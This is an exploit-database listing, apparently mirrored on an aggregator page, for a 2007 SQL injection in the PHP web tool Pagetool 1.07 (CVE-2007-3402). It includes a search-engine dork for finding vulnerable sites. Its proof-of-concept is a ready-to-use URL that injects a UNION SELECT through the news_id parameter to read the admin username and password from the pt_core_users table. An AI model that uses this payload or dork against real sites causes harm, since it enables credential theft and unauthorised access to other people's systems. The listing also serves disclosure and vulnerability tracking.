Lucene search
KatatafishEDB-ID:4107HistoryJun 25, 2007 - 12:00 a.m.
Pagetool 1.07 - 'news_id' SQL Injection
2007-06-2500:00:00
Katatafish
www.exploit-db.com
32
AI Score
7.4
Confidence
Low
###pagetool-1.07 Remote SQL Injection###
#
#download:http://kent.dl.sourceforge.net/sourceforge/pagetool/pagetool-1.07.tar.gz
#
#Found by: Katatafish ([email protected])
#
#Dork: "powered by Pagetool"
#
#Thanks: str0ke
#
########################################
#PoC
http://www.site.com/[path]/index.php?name=pagetool_news&news_id=-1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/**/username),/**/CONCAT(0x50617373773072643A20,/**/passwd),/**/null/**/from/**/pt_core_users/**/where/**/user_id=1
# milw0rm.com [2007-06-25]Related
cve
cve
CVE-2007-3402
2007-06-26 17:30:00
cvelist
cvelist
CVE-2007-3402
2007-06-26 17:00:00
prion
prion
Sql injection
2007-06-26 17:30:00
nvd
nvd
CVE-2007-3402
2007-06-26 17:30:00